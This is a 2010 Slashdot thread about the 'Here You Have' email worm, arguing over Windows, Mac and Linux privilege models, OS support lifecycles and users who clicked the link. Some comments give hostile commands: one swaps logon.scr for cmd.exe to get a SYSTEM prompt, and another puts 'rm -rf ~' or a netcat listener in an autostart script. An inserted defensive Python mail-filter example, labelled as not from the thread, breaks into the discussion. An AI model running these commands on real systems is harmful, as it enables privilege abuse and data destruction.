      I think that can be translated as, "While logged in as Administrator..."

      --
      ...the future crusty old bastards are already drinking the Kool-Aid.
    4. Re:Umm.. nope. by Anonymous Coward · · Score: 0

      Which is the account most commonly used for day-to-day tasks by non-technical users on a Mac.

    5. Re:Umm.. nope. by tepples · · Score: 1

      Stupid question from a Linux / Mac user:

      Are there really operating systems in use in 2010

      [Windows XP gives everyone admin by default and is still in wide use]

      The grandparent was talking about Macs, smartass.

      I didn't understand it that way. Instead, I understood it as follows: One poster uses Macs and wants to learn about other operating systems still in use.

    6. Re:Umm.. nope. by Anonymous Coward · · Score: 0

      Still wrong. Sudo would be required, just like on Linux.

    7. Re:Umm.. nope. by al0ha · · Score: 1

      Uh, most Mac users do everything in the admin account, because the first account you set up to use has admin privileges. If you have not specifically configured another account, then writing to the root file system is accomplished without requiring any password.

      It is not the same on Unix or Linux.

      --
      Did you ever wake up in the morning, with a Zombie Woof behind your eyes? -- FZ
    8. Re:Umm.. nope. by al0ha · · Score: 1

      Incidentally, that account can also write to and create executables in

      /Library
      /Applications

      Great way to p0wn a system is to write malware to a . directory in /Applications or /Library

      Bottom line is Macs are as susceptible to system-installed malware as Windows systems, unless on each system you specifically choose to create a second account without admin privs to use for general computing purposes, which most users don't, thus the reason for my original response.

      --
      Did you ever wake up in the morning, with a Zombie Woof behind your eyes? -- FZ
    9. Re:Umm.. nope. by drsmithy · · Score: 1

      That would only work if you were logged in as the admin account..

      Ie: the default, which the vast, vast majority of people will be using.

      Or do you do everything as root?

      An "admin" in OSX is not root.

    10. Re:Umm.. nope. by BenoitRen · · Score: 1

      Those quotes are from the beginning of the thread to which you appended my comment, ignoring the comments in-between. It goes like this:

      Are there really operating systems in use in 2010 that let you write files to a system directory without entering an administrator password?

      Yes and actually Macs are one of them Mr. Snarky. In the original account set up on your Mac perform the following

      That would only work if you were logged in as the admin account.. Or do you do everything as root?

      As you can see, that comment was talking about an admin account on a Mac. Then you reply talking about Windows XP and I roll my eyes.

  21. Lulz @work today by mrsam · · Score: 5, Interesting

    Initially, got a few batches of these at $work$ today -- one of the remaining 800lb Wall Street gorillas. The mails originated from some senders @NYSE, and were sent to some internal mailing lists.

    It didn't take long before a bunch of our own drooling baboons clicked the link, causing more mails to go out to the internal lists. That went on for a few hours. Then came the inevitable "why are you sending this", "i must've gotten this by mistake", "take me off the list" replies from more internal senders, resent to the same internal lists. Then came the inevitable "this is a virus, do not reply to all" replies to all.

    I told my management that what they have in their inbox, basically, is a list of people to get the axe when the next round of layoffs comes around. Can't create a more accurate list of people who are truly the bottom of the barrel, and do not belong in an organization that's supposedly charged with billions of investors' and depositors' money.

    P.S. -- I also thought that this was the exploit for the 0-day PDF flaw too, given the .pdf extension. But if this was just an ordinary executable, that you actually had to click through an extra time to execute, then there's even less excuse for anyone with a brain to get infected with this.

    1. Re:Lulz @work today by ShaunC · · Score: 1, Funny

      I told my management that what they have in their inbox, basically, is a list of people to get the axe when the next round of layoffs comes around.

      Damn I wish I had mod points. The sad fact is, I'd be willing to bet some of my own money that everyone on that list makes more than you do.

      --
      Thanks to the War on Drugs, it's easier to buy meth than it is to buy cold medicine!
    2. Re:Lulz @work today by mrsam · · Score: 0, Offtopic

      The sad fact is, I'd be willing to bet some of my own money that everyone on that list makes more than you do.

      You'd lose this bet. Some may do, but most of them were, apparently, some low-level flunkies in various Bumfuck, Nowhere branch offices.

      Change that "everyone" to "some", or perhaps to "most", and you got yourself a winner. But you'd lose the "everyone" bet.

    3. Re:Lulz @work today by Anonymous Coward · · Score: 0

      Wow, well done you! (No sarcasm intended, it's nice to see an IT guy who isn't in the bottom 10% of the salary ladder.)

    4. Re:Lulz @work today by don_carnage · · Score: 1

      We thought the same thing, but when I actually looked at the link it turned out to be an .SCR. We're still not sure how it got on our network.

    5. Re:Lulz @work today by Anonymous Coward · · Score: 0

      According to some online articles, the pretend pdf link goes to an .scr executable file.

    6. Re:Lulz @work today by Anonymous Coward · · Score: 0

      Spoke to my boss about this very thing - there is nothing better at weeding out the incompetents. Natural selection at its finest.

    7. Re:Lulz @work today by Datamonstar · · Score: 0, Flamebait

      Good for you, asshole. You got to command the fate of a few people based on some non-relevant criteria hawked up in your own tiny-walled head. How about you let the management make the staffing decisions and you stick to browsing Slashdot at work? Don't be surprised if YOU are the one given the axe for 1. thinking you know how to do management's jobs better than they do and 2. for being annoying and obnoxious to your fellow co-workers.

      --
      The eternal struggle of good vs. evil begins within one's self.
    8. Re:Lulz @work today by Anonymous Coward · · Score: 0

      Hmmm. I'm under the impression you forgot to tick 'Post Anonymously' box. That, or you have brass balls, even with very good standing within the company.

      The people you're referring to as being ripe for lay-off have most likely been hired by the same managers that you're now suggesting to that they are... less intelligent. Doesn't look too good on management. Furthermore, even if these employees are unaware that opening these mails is a bad thing, they might be very good at trading stocks or doing something else that you wouldn't be able to do if your life depended on it. Add to that that you're probably in a cost-center while they might actually be earning the company money and you can see where this is going to go.

      What I'm saying here is: different people, different skills, different circumstances, different decisions, different outcomes. Those outcomes may not be the ones you would like to have. Since you don't make the ultimate decisions, your opinion may very well not come into play. Good luck to you, nonetheless :).

    9. Re:Lulz @work today by KevinIsOwn · · Score: 2, Interesting

      Looks like somebody is embarrassed that they clicked the link to the virus. No, those weren't pictures from the party. Sorry.

      But seriously, how is that a non-relevant criteria? Especially if you had somebody who has done it multiple times, that is a major risk to the company's network. Especially for a company with people's financial information, you can't have people downloading such ridiculous things.

    10. Re:Lulz @work today by Anonymous Coward · · Score: 0

      It's pretty hard to have sympathy for people that are STILL practicing poor e-mail habits after 20 years.

    11. Re:Lulz @work today by DeanFox · · Score: 1

      Good for you, asshole. You got to command the fate of a few people based on some non-relevant criteria hawked up in your own tiny-walled head. How about you let the management make the staffing decisions and you stick to browsing Slashdot at work? Don't be surprised if YOU are the one given the axe for 1. thinking you know how to do management's jobs better than they do and 2. for being annoying and obnoxious to your fellow co-workers.

      I'm guessing by your tone you're one of those who either clicked the link or replied to "all". I thought he had a good point. I tend to lose a touch of respect for co-workers I get these emails from. My first thought is usually: "Wow, he/she fell for this?".

    12. Re:Lulz @work today by Culture20 · · Score: 1

      We thought the same thing, but when I actually looked at the link it turned out to be an .SCR.

      And a .scr is nothing more than a .exe renamed to .scr. Try this:
      move c:\windows\system32\logon.scr c:\windows\system32\logon.scr.bak
      copy c:\windows\system32\cmd.exe c:\windows\system32\logon.scr
      then log off and wait for the screensaver. Tada, SYSTEM user command prompt instead of screensaver. Screensavers are just executables on Windows.

    13. Re:Lulz @work today by Anonymous Coward · · Score: 0

      Eh, eh, eh. @NYSE here... and we're still getting them *today*.

      On a related note, I'm shocked at how long it takes to "handle" this issue. It seems a simple rule on the server side would kill this email for *everyone* in the whole company... or am I imagining a lucrative business opportunity for such a space-age feature?
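One shape such a server-side rule could take, as an added illustration that is not from this thread or from any mail product: a gateway-side classifier that quarantines a message when its subject matches the reported "Here You Have" line and one of its links points at a Windows executable extension (the .scr behind the fake pdf link mentioned above), and merely flags a message that trips only one of the two. The sample messages, host names and regexes are constructed for the example.

```python
import re
from email import message_from_string
from urllib.parse import urlparse

# Subject line reported for this worm in the thread. The regex is constructed
# here to tolerate case and spacing variations ("Here you have", "here  you have").
SUSPECT_SUBJECT = re.compile(r"\bhere\s+you\s+have\b", re.IGNORECASE)

# Extensions that Windows treats as programs when opened. .scr is the one the
# thread describes; the rest are added here as an assumption about what a gateway
# would reasonably treat the same way.
EXECUTABLE_EXTENSIONS = {".scr", ".exe", ".pif", ".com", ".bat", ".cmd"}

# Crude URL extractor: stops at whitespace and at the quote characters that
# close an HTML href attribute, so <a href="http://x/y.scr">report.pdf</a>
# yields the real target, not the displayed "report.pdf" text.
URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)


def message_urls(msg):
    """Collect every http(s) URL from the text/plain and text/html parts."""
    urls = []
    for part in msg.walk():  # a single-part message walks over just itself
        if part.get_content_type() in ("text/plain", "text/html"):
            payload = part.get_payload(decode=True)
            if payload:
                urls.extend(URL_RE.findall(payload.decode("utf-8", "replace")))
    return urls


def url_points_to_executable(url):
    """True when the URL path ends in an executable extension (e.g. .pdf.scr)."""
    path = urlparse(url).path.lower()
    return any(path.endswith(ext) for ext in EXECUTABLE_EXTENSIONS)


def classify(raw_message):
    """Return a verdict dict for one raw RFC 822 message string.

    quarantine: subject matches AND a link targets an executable
    flag:       only one of the two indicators is present
    deliver:    neither indicator is present
    """
    msg = message_from_string(raw_message)
    subject_hit = bool(SUSPECT_SUBJECT.search(msg.get("Subject", "")))
    exe_links = [u for u in message_urls(msg) if url_points_to_executable(u)]
    if subject_hit and exe_links:
        verdict = "quarantine"
    elif subject_hit or exe_links:
        verdict = "flag"
    else:
        verdict = "deliver"
    return {"verdict": verdict, "subject_hit": subject_hit, "exe_links": exe_links}


# Constructed sample messages (not captured worm traffic). The first mimics the
# pattern described in the thread: a link displayed as a PDF whose target is .scr.
WORM_SAMPLE = """\
From: colleague@example.invalid
To: everyone@example.invalid
Subject: Here you have
Content-Type: text/html; charset=utf-8

<html><body>Please see the document:
<a href="http://malware.example.invalid/Document.pdf.scr">Document.pdf</a>
</body></html>
"""

BENIGN_SAMPLE = """\
From: colleague@example.invalid
To: everyone@example.invalid
Subject: Quarterly report
Content-Type: text/plain; charset=utf-8

The report is at http://intranet.example.invalid/reports/q3.pdf
"""

SUBJECT_ONLY_SAMPLE = """\
From: colleague@example.invalid
To: everyone@example.invalid
Subject: Here you have
Content-Type: text/plain; charset=utf-8

Here you have the slides: http://intranet.example.invalid/slides.pdf
"""

if __name__ == "__main__":
    for name, raw in (("worm", WORM_SAMPLE), ("benign", BENIGN_SAMPLE),
                      ("subject-only", SUBJECT_ONLY_SAMPLE)):
        print(name, classify(raw))
```

A production gateway would also decode quoted-printable or base64 bodies (get_payload(decode=True) already handles those) and resolve redirect shorteners, which this example deliberately leaves out.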

    14. Re:Lulz @work today by StuartHankins · · Score: 1

      Good luck in your new job!

    15. Re:Lulz @work today by Datamonstar · · Score: 1

      It's non-relevant because he specifically said he worked for a financial company and not an IT company. Whether these people work in the IT department of a financial company, I don't know, but I don't expect people who aren't technical insiders to fully understand these sorts of threats. I work for an IT shop and people here still clicked it. I didn't. I immediately knew what it was, but I still wouldn't want those who were duped to lose their jobs over it. There are a lot of clinical people who are NOT on the IT side, but still have us on their mailing list, for example.

      The risks to the company lie with those charged to protect it, not the ones who are expected to come in to work, do their jobs and be profitable. This was either an unseen risk that suddenly impacted them, or a known risk that became realized. Either way, IT security is responsible. Or do you really think they can just blame all the people who clicked the link?

      I don't know where you work, but I'm glad I don't work there considering how, obviously, people can be fired for being tricked by a social engineering trick that was specifically designed to trick them. Oh, and it's your fault you got mugged on the way home from work, too! Should have taken a different route, or somehow known that the jogger passing you up was really a thug in disguise.

      --
      The eternal struggle of good vs. evil begins within one's self.
  22. Three things by Sycraft-fu · · Score: 4, Insightful

    1) Yes, older ones. Unlike Apple, other companies don't force you to stop using an OS after a couple years. MS supports their OSes for a minimum of 10 years, and XP is scheduled to be supported until 2014. On XP most users run as an administrator, and thus need no privilege escalation to do anything. This is not required, they could run as a normal user, however they don't.

    2) Who says you need system access? Most spyware we encounter these days doesn't bother, it just infects the user directory. No admin needed. Also, some detection tools have trouble noticing it when you log in as an admin and run them, since it is inactive at that point.

    3) We are talking about people who will run executables from e-mail, something they've been told not to do about 1,000,000 times. You REALLY think an admin prompt will stop them? Hell no, they'll just grant permission.

    If you think having to escalate privilege protects an OS, you are deluding yourself. Don't get me wrong, I like the feature and in the hands of a technical user it is a useful defense. However it does shit for the clueless users. You cannot protect someone against themselves and still give them control over their own system.

    1. Re:Three things by BenoitRen · · Score: 1

      MS supports their OSes for a minimum of 10 years, and XP is scheduled to be supported until 2014.

      A minimum of 10 years? Where did you get that from?

      • Windows 95 was supported for 6 years.
      • Windows NT 4.0 was supported for 8 years.
      • Windows 98 was supported for 8 years.
      • Windows Me was supported for 6 years.
    2. Re:Three things by UnknowingFool · · Score: 1

      If you think having to escalate privilege protects an OS, you are deluding yourself. Don't get me wrong, I like the feature and in the hands of a technical user it is a useful defense. However it does shit for the clueless users. You cannot protect someone against themselves and still give them control over their own system.

      Do you know how Linux and Unix systems work? One of the reasons that viruses do not infect them the same as Windows is that it requires privilege escalation to do any real damage. With Windows most users run with admin privileges. Before you grouse about how competent admins would have locked down Windows, realize that you can lock down Windows but it makes things very, very difficult for normal users and administrators to get things done. For many years, running many Windows applications required admin access. As applications transition to a more secure minded Windows model, security might get better. And if memory serves me correctly, a user sometimes doesn't need to actually download or run something in Windows to execute malicious code. Remember the Windows shortcut exploit that was released less than a month ago? In that case, it didn't matter if the user was clueless or not.

      --
      Well, there's spam egg sausage and spam, that's not got much spam in it.
    3. Re:Three things by Missing.Matter · · Score: 1

      I think the point is Microsoft waits until most users aren't using a particular operating system before dropping support. Support for XP is going on 10 years now, and will go for 13 since proportionately many users are (and will be) using it. How many users were using Windows 98 in 2006?

      This is opposed to Apple, who for example released security updates to 10.4 for only 4 years. Oh, and of course who dropped all future OS support for hardware produced before 2006.

    4. Re:Three things by joeyblades · · Score: 2, Informative

      Unlike Apple, other companies don't force you to stop using an OS after a couple years.

      Huh? Ummm... I have a G3 Gossamer, purchased in 1997, running OS 9 since 1999, that is still going strong... still running Mac OS 9. Apparently I escaped under Apple's merciless radar because they have not forced me to stop using it. It's still a rock solid machine and I sometimes still use it to run some old PowerPC software and (get this) I can still run some 68000 software in emulation mode.

      And for the record, I know you were really trying to make a statement about OS support, but I couldn't let you get away with rewriting history:

      • Windows 95 was supported for less than 3 years.
      • Windows NT was only supported for 4 years.
      • Windows 2000 was only supported for 5 years.
      • Windows XP has only been supported for this long because Microsoft screwed the pooch. If Vista would have come out sooner and if Vista wouldn't have been such a bomb and if Microsoft could make their new OSes support the tons of enterprise software that currently depends on XP, XP would be long dead.
    5. Re:Three things by Anonymous Coward · · Score: 0

      I have a 233 MHz G3 iMac (Bondi Blue, I think it was called). It has that funny handle on the top and came out in 1998 and runs OS X.
      Still works fine today and I can get patches as needed.

      Let's see ... that would have been NT4? Or Windows 98?

      Can you get patches for NT4 or 98?

    6. Re:Three things by turbidostato · · Score: 1

      "One of the reasons that viruses do not infect them the same as Windows is that it requires privilege escalation to do any real damage."

      What do you mean by "real damage"?

      I'd say that deleting all the user's valuable data is "real damage".
      I'd say that opening a network socket, either to connect out or to start a process listening on an unprivileged port for a botnet, is "real damage".

      Neither of them needs privilege escalation.

    7. Re:Three things by Anonymous Coward · · Score: 0

      UnknowingFool,

      You don't need any fancy privileges. The typical user account has plenty even on Linux. I can execute files in my home folder just fine. I can even add things to login scripts which are in my home directory tree. I can play library loading games with .desktop files too. Why do you assume malware wants to do much more than just simply be a bot or collect sensitive information?

      I don't keep my sensitive information on root. I don't browse to my bank account as root either. You don't need to compromise root to get to that information.

    8. Re:Three things by UnknowingFool · · Score: 1

      Really? So in Linux/Unix, I can download a file and it autoruns and runs amok? Oh wait, I don't have to run it. I open a folder containing a bad shortcut and my computer gets owned? In Linux/Unix the user's files might be affected not the system files, not other users. Windows was never designed with security from the beginning. It has been patched in. And some of the patches are not large enough to cover up all the holes.

      --
      Well, there's spam egg sausage and spam, that's not got much spam in it.
    9. Re:Three things by Eskarel · · Score: 2, Insightful

      Bullshit.

      Linux is a multi-user system; it's specifically designed to allow you to run pretty much any kind of software as a user that you might possibly want.

      True you can't write to the system directories, but you can sure as hell write to anywhere in the users home directory and cause anything you like to auto run when that user logs in. The only thing you can't do is open a port below 1024, but you don't need to use any of those ports unless you want to use default ports.

      Want a zombie SMTP server, file server, web server, all fine and dandy, you just use non default ports, hell 8080 doesn't even require root access to start. You want to access someone's files, exploit their web browser, all fine.

    10. Re:Three things by Eskarel · · Score: 2, Insightful

      For the purposes of most home PCs, THE USER'S FILES ARE THE ONLY ONES THAT MATTER. Very few home PCs have multiple isolated users.

      Desktop Windows is not a truly multi-user system, but it isn't supposed to be because that's not how it's used.

    11. Re:Three things by turbidostato · · Score: 2, Insightful

      "Really? So in Linux/Unix, I can download a file and it autoruns and runs amok?"

      Of course yes. Do you think there is any magic forbidding a browser from downloading an OpenOffice document and gladly opening it or, say, a Firefox extension from downloading a shell script mime-typed as text/x-script and executing it?

      "I open a folder containing a bad shortcut and my computer gets owned?"

      Owned? maybe not. But if you use a KDE desktop environment please put into ~/.kde/Autostart a script (or a symlink to a script) with something like `rm -rf ~` or `nc -l -p 23456` and see what happens (other desktop environments have different directories to same effect). Oh, and if you don't want to put the script, how do you think your filesystem browser is able to produce thumbs for common applications (hint: have a look at those directories with `ls -la`).

      "In Linux/Unix the user's files might be affected not the system files"

      And what the heck do you think your standard home user thinks is of more value? /bin/ls or the e-mails from his son studying abroad?

      "Windows was never designed with security from the beginning."

      Quite true. And what the heck has that to do with the fact that Linux is wide open to both PEBCAK and "marketing pushed for the good of joe sixpack usability" application design malpractices?

    12. Re:Three things by Anonymous Coward · · Score: 0

      Unlike Apple, other companies don't force you to stop using an OS after a couple years

      Mac OS X was released in March, 2001. By my calculation, 9 1/2 years is a lot longer than "a couple". And I have never seen these Apple jack-booted thugs you speak of.

    13. Re:Three things by Anonymous Coward · · Score: 0

      MS supports their OSes for a minimum of 10 years, and XP is scheduled to be supported until 2014.

      A minimum of 10 years? Where did you get that from?

      • Microsoft Support Lifecycle Policy - "The Microsoft Support Lifecycle policy took effect in October 2002, and applies to most products currently available through retail purchase or volume licensing and most future release products. Through the policy, Microsoft will offer a minimum of:
        • 10 years of support (5 years Mainstream Support and 5 years Extended Support) at the supported service pack level for Business and Developer products
        • 5 years Mainstream Support at the supported service pack level for Consumer/Hardware/Multimedia products"
    14. Re:Three things by jcupitt65 · · Score: 1

      I don't know of a Linux equivalent to this attack. No Linux desktop will download and execute a file when you click on a link. No Linux desktop will even let you execute a downloaded file unless you first right-click on it and set the executable bit. And even then it will only run as the user. And even code running as the user won't have access to the user's passwords, since they are encrypted.

      It's not all roses, of course. GNOME .desktop files will execute even without the x bit set, annoyingly, though I think they are planning to change that. And as you say being limited to the one user is good, but not good enough for the user whose files got hosed.

    15. Re:Three things by jcupitt65 · · Score: 1

      GNOME .desktop files will execute even without the x bit set ...

      I checked again, and it sounds like this has been addressed. Phew!

      https://wiki.ubuntu.com/SecurityTeam/Policies#Execute-Permission%20Bit%20Required

    16. Re:Three things by Sycraft-fu · · Score: 1

      Go and look it up. Support doesn't end the date a new OS comes out. You are correct in that older MS OSes were not always supported for 10 years (that is a new policy, starting with Windows 2000). However NT4 supported for 4 years? Not hardly, it was supported until 2004 (released in 1996). Windows 2000 was supported until July 13 2010 (released in 1999). Windows 95 was supported for much less than 10 years, but more than 3. It was released in 1995, of course, and supported until December 2001.

      Remember: Supported doesn't mean "On store shelves." Supported means that they release security updates, test compatibility, offer enterprise support, and so on.

      For Windows 2000 on, they pledge 10 years from date of release, 5 years mainstream support (meaning service packs and feature updates) and 5 years extended support (meaning mostly just security updates). This can be extended, of course. It was extended a bit for Windows 2000 and a lot for Windows XP.

      Remember that in the real world, what we care about for support is the ability to have something operating on the Internet safely. That means it needs to be actively patched. THAT is what support means. Yes, I know you can still run old OSes. You don't even need old hardware, a VM will do nicely. However those are unsupported as in not patched, not safe for Internet use.

      Same deal with Ubuntu and their LTS releases. What they are saying there is "We'll support this particular version for longer." Normally Ubuntu only supports a version for 18 months, and they release a new one every 6. So they only guarantee patches for 18 months from date of release. Doesn't mean there's not a new, patched, version to move to, just that you have to move to the new one. The LTS releases they support for longer, 3 years for a desktop, 5 for a server. The new versions continue to come out, however they keep patching those LTS versions actively, hence they are supported.

      That is what support means in this context. If it doesn't matter to you that's fine, understand that it matters to enterprises. We are interested in not having our shit get hacked.

    17. Re:Three things by Anonymous Coward · · Score: 0

      We are interested in not having our shit get hacked.

      Quite ironic, then, that you're posting in response to "New Email Worm Squirming Through Windows Users' Inboxes".

      Yes, I'm laughing at you, while you're waving arms about 10 year support you can't even keep today's worms and viruses out. You couldn't keep out yesterday's, and you won't be able to keep out tomorrow's. There's so much fail I don't know where to begin.

      And before you go blaming stupid users for everything again, explain why none of this happens to other OSes. Explain why Windows has a 100% monopoly on viruses and requires antivirus software. Really, go on, this will be amusing. I'm wondering if you'll take the stance that only Windows users are stupid enough to cause these kinds of problems.

    18. Re:Three things by cusco · · Score: 1

      Mac and Linux worms have both been demonstrated, but they're such a small portion of the market that no one bothers. Additionally, the tools for writing worms/bots/malware for Windows systems already exist and crackers are accustomed to them. Why would they want to spend the time and energy creating and learning new tools to attack five percent of the market?

      --
      "Think about how stupid the average person is. Now, realise that half of them are dumber than that." - George Carlin
    19. Re:Three things by drsmithy · · Score: 1

      Windows 95 was supported for less than 3 years.

      False. Windows 95 support ended December 31, 2001.

      Windows NT was only supported for 4 years.

      False. Windows NT (4.0, I assume you mean) ended June 30, 2004.

      Windows 2000 was only supported for 5 years.

      False. Windows 2000 support ended July 13, 2010.

      Windows XP has only been supported for this long because Microsoft screwed the pooch.

      False. Windows XP's support lifecycle was only marginally lengthened from the one it had on the day it was released.

    20. Re:Three things by drsmithy · · Score: 1

      Do you know how Linux and Unix systems work? One of the reasons that viruses do not infect them the same as Windows is that it requires privilege escalation to do any real damage.

      Please define "real damage". Because I am well aware of "how Linux and Unix systems work" and I can't think of many things malware might want to do that it requires elevated privileges for.

      And if memory serves me correctly, a user sometimes doesn't need to actually download or run something in Windows to execute malicious code. Remember the Windows shortcut exploit that was released less than a month ago? In that case, it didn't matter if the user was clueless or not.

      These are called exploits. They happen on all platforms.

  23. Social engineering by Acetylane_Rain · · Score: 1

    There's a confusing reference to "containing malicious executables" in the first sentence of the summary, which appears to be a nearly direct quote of the first few paragraphs of the article itself. However, the emails only contain a "link" to the malware, which, of course, is less exciting news, since that's what some s(p/c)ammers already do. (To be sure, this is corrected in the second sentence which mentions the "messages contain a link" to the file.) This is a two-stage browser-based attack, which uses social engineering via email as its point of entry.

    Incidentally, the link to the article is to a site hosted by an anti-virus vendor, rather than an independent security company. So take it all with a grain of salt or puff of powder.

  24. it's comcast they can't even get cable right at ti by Joe+The+Dragon · · Score: 1

    it's comcast they can't even get cable right at times and they still have a hard time with people in the call center getting info to the cable guys. Try asking for a cable card or if you want some fun tru2way.

  25. they wouldn't care anyway by Anonymous Coward · · Score: 0

    I'm in a position where I am here to help people with their workstations. Basically it is a, "put out fires" situation. I could tell people about this latest issue with Microsoft products, but the reality is, they wouldn't listen anyway. Of course, if they listened, they wouldn't have Outlook on their PC's in the first place.

  26. some stuff does not need admin to take over the sy by Joe+The+Dragon · · Score: 1

    some stuff does not need admin to take over the system even more so when it uses old windows 3.1 or 9x holes that are still in XP, vista and 7.

    The old code is not holes but old printing or other sub systems that are not in use any more but the code base that that old system used is still in the windows code base.

  27. Worm? No by nurb432 · · Score: 1

    Trojan, yes.

    Worms don't need human intervention to spread. ( technically, neither do viruses )

    --
    ---- Booth was a patriot ----
    1. Re:Worm? No by Torodung · · Score: 1

      "Morris" wants a word with you.

    2. Re:Worm? No by gsgriffin · · Score: 1

      True. Trojans do require people to apply them and can be quite effective in penetrating the defenses....

      wait a second...what are we talking about?

      --
      jsut athnoer menagiensls ltitle psrhae for you to dcoede. Why do we wtsae our tmie dnoig tihs?
  28. Not a worm... by TrancePhreak · · Score: 3, Informative

    This is a merely a trojan. A real worm would infect other machines without intervention.
    http://en.wikipedia.org/wiki/Computer_worm

    --

    -]Phreak Out[-
    1. Re:Not a worm... by Anonymous Coward · · Score: 0

      The cross-host propagation makes it a worm. The article you linked to says:

      it *may* do so without any user intervention

    2. Re:Not a worm... by Anonymous Coward · · Score: 0

      If it reproduces with the help of a biological host, it's a parasite.

    3. Re:Not a worm... by Anonymous Coward · · Score: 0

      Bingo, and so sad this comment wasn't made earlier. This is slashdot people!

  29. Windows XP is still "in use in 2010" by tepples · · Score: 1

    And guess what-- the "in 2010" comment doesn't really apply to an OS from 2002, does it?

    The question was "Are there really operating systems in use in 2010". Windows XP, despite that it is a major version back, is still "in use in 2010", especially on older or subcompact hardware on which Windows 7 would underperform.

    1. Re:Windows XP is still "in use in 2010" by Anonymous Coward · · Score: 0

      My company is still on XP for the vast majority of users - Vista really bothered the Desktop/Infrastructure guys, so they chose to wait, and even though Windows 7 has been out a while, they just haven't wanted to deal with the hassle and expense of upgrading everyone. I think they may be waiting 'till everyone's on a downgraded Win7 license so it will just be the hassle rather than the expense part.

      As a desktop user, I ~like~ Windows XP, if I wear my old (semi-retired) SysAdmin hat, I think I'd like my users on Windows 7.

      Posting anon so as not to identify/embarrass my employer

  30. "Download"? by LambdaWolf · · Score: 2, Insightful

    ...the messages contain a link to a site that will download a malicious file to the victim's PC.

    Shouldn't it be that the site uploads a file to the PC, while the PC (or the worm itself) downloads it? I know the distinction is lost on the vast majority of users these days—which is a shame, since the concepts of "sending" and "receiving" are important enough to distinguish—but c'mon, this is Slashdot.

    --
    "This algorithm runs in constant time. Come on, 2,147,483,648 is a constant..."
    1. Re:"Download"? by Anonymous Coward · · Score: 0

      Download means the direction of the data transfer is from the server, the one that listens, to the client, the one that initiated the connection.

    2. Re:"Download"? by Confusador · · Score: 1

      Misplaced modifier there, so I don't think it's so much technically wrong as grammatically wrong, and, hey, this is Slashdot! It's not a "link to a [site that will download]", it's a "[link to a site] that will download". The link is the actor, not the site. It would be more accurately worded "contain a link that, when clicked, would cause a malicious file to be downloaded...", which is a bit more cumbersome than is needed here.

    3. Re:"Download"? by Anonymous Coward · · Score: 0

      The link downloads the file, the site does not. This is Slashdot; grammar constructs are important enough to distinguish.

    4. Re:"Download"? by Anonymous Coward · · Score: 0

      I know what you mean. Every time I hear someone say 'upload' when they mean 'download' and vice versa I have to stop my suddenly itchy hand from slapping them.

      Fits right in there with idiots saying 'log on to our website' when they mean 'visit our website'.

      SLAP!

    5. Re:"Download"? by Anonymous Coward · · Score: 0

      Clicking the link causes the file to be downloaded by the PC. At the expense of being verbose the phrasing could have been clearer.

  31. It's not by Sycraft-fu · · Score: 4, Insightful

    The problem is that Mac/Linux users loved to bang on about this as a reason their OSes were more secure. "Oh asking for an admin password protects us." Of course it doesn't, you still have to know what you are doing but there you go. So then Windows got it too. Well now this is a problem, you can't claim it as an advantage anymore. What's more, Windows does it right, it is true privilege separation, and it doesn't cache it like a number of Linuxes do (you sudo in the GUI and it stays that way for 10 minutes). So what to do? Oh, well attack it from asking too often, of course! Never mind it only asks for, you know, things that actually require access. It is still too often!

    Some people just have a mindset that their OS is Superior and Windows is Inferior. Thus they'll come up with whatever justifications it takes to convince themselves of that. It isn't about facts, it is about a belief they are trying to justify.

    Also to the people who think admin gets asked for too much: Please remember that anything that doesn't need admin to do, a virus/spyware can do without that admin. So if a program can be installed without admin (and it can actually, just only to that user's account, not system wide) then a virus can be installed without admin. There is no half way, you can't have something that only a legit program can do that a virus needs admin for. Something either does or does not require admin. Period.

    1. Re:It's not by wvmarle · · Score: 1

      It has been a long time since I had to enter my root password in the GUI for some software, and that was only for installation. And as such, when expected.

      Windows I haven't used for more than a decade, but it seems that many many programs routinely ask for privilege escalation. Often unexpected. And users do not even have to enter a password, they just have to click. Have them enter their password all the time and they would at least get more annoyed, and that may also cause software to be fixed.

      Software that a user downloads in Linux can be run by that user, sure. It can do lots of bad things that way, sure. However what it can not do is install and hide itself into some system directory, making detection and cleaning an infection much easier on Linux.

      And that is not even looking at the many many security bugs that are still present in Windows.

      A big difference of course remains that Unixes have been set up from the ground up to be networked and have various users with various permissions. Windows has got this patched on later, having to deal with a huge legacy of all kinds of apps that didn't expect these restrictions. It's not without reason that many people here on Slashdot would suggest MS throw out what they have and start from scratch, just like Apple did. OS 9 had become a mess. Insecure, buggy, unstable, unmaintainable. So they started anew, and very successfully.

    2. Re:It's not by Sycraft-fu · · Score: 1

      Here's the thing you forget: If software can do X without needing a password, so can a virus. If you can install software on your system with no password that can access your data, get out and communicate on the network and so on and never ask for a password, so can a virus. There's no "evil bit" that the OS can check for to only allow software that is nice to do that and require admin in other cases. The only thing it can't do is infect the entire system (unless there's an exploit).

      OK, the problem is if that seems like good security to you, you are being narrow minded. You are thinking of all systems as being servers which is not at all the case, and I'm sure is not the case of the computer you are using.

      I've recovered a lot of desktops in my time working in computers. Failed disks that the person didn't back up, virus infestations, users just doing stupid shit. Whatever the case the system goes asplode. You want to know what they care about in EVERY case? Their data. That is all. They want their documents, their e-mail, their stupid background picture. That is -IT-. They don't give a shit about the system itself: not only can it be reinstalled, it WILL be reinstalled. They just want the data.

      So if you think that not having to escalate privilege when you install apps means you are protected, it means the precise opposite. It means that any of those apps you normally use could be evil and you'd never be the wiser. They could take out all your data, hose everything right up, and never ask for a password. Oh sure, you could log in as root and remove them, but to what end? I don't care if I have to reinstall, I care if I lose data.

      Linux types have really talked themselves up that they have this amazing system security that just doesn't exist. Everything I hear is just like your post: A bad misunderstanding of what is actually important, and how systems actually work. You keep thinking in a server mindset, where the system matters more than a user's data. That just isn't the case on desktop systems, which is what we are talking about here. Also, here's news: On a server, when you wish to install software for all users, you DO have to become root. We do it all the time at work for our shell servers. We have software X that everyone needs. That means it has to be installed system wide, that means root.

      FYI Windows works the same way. In our labs, users don't get admin access. As such they can (and occasionally do) hose their accounts/data, but the system itself is fine.

    3. Re:It's not by Missing.Matter · · Score: 1

      I'm sorry, you readily admit that you haven't used Windows in 10 years, yet you're making assertions about a version released 11 months ago. Where are you gaining this insight?

      It has been a long time that I had to enter my root password in the gui for some software, and that was only for installation. And as such when expected.

      That's the default behavior in Windows 7.

      It it seems that many many programs routinely ask for privilege escalation. Often unexpected.

      It seems? So you're basing these comments off of something, rather than blowing hot air? I would love to see some examples of these mysterious and unexpected UAC prompts. SInce you've never used Windows 7, I'm sure this will be a hard request.

